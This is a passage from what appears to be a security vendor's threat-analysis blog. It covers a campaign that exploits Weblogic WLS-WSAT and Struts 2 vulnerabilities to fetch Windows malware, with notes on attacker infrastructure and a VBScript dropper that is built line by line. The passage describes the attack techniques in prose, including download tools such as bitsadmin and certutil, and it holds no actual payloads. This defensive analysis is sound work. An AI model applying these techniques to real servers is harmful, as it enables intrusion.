Figure 2: Weblogic WLS-WSAT campaign attempting to download and execute the same Windows executable file

This attempt to download the same file immediately indicated to us that the same attacker was using different exploits in the operation. Unfortunately, these files weren’t available to download from the original server nor from other malware repositories, so they could not be analyzed.

Investigating the IP addresses generating the campaign requests revealed various server systems such as Apache Tomcat, MySQL, FTP, and NTP servers, which indicated these machines were not serving as bots but instead were probably machines owned or hacked by the threat actor. Most of the servers’ software versions had known exploits, which further strengthen this assumption.

Unavailable malware files combined with the fact that these were non-bot machines indicates the possibility that this operation is still under development and a full botnet infrastructure has not been deployed yet.

Spearhead VBScript

While VBScript is commonly used by attackers to lure victims into opening malicious Microsoft Word documents, it’s typically not used by attackers who target web servers via code execution vulnerabilities to download malware to machines. Those attackers usually prefer using PowerShell or other Windows built-in command line tools like bitsadmin and, for more creative attackers, regsvr32 and certutil, which we described in a previous blog. Once the Struts 2 vulnerability is triggered, malicious Java payload constructs the VBScript on the fly by creating an empty file in the “temp” directory and appending the VBScript code row by row.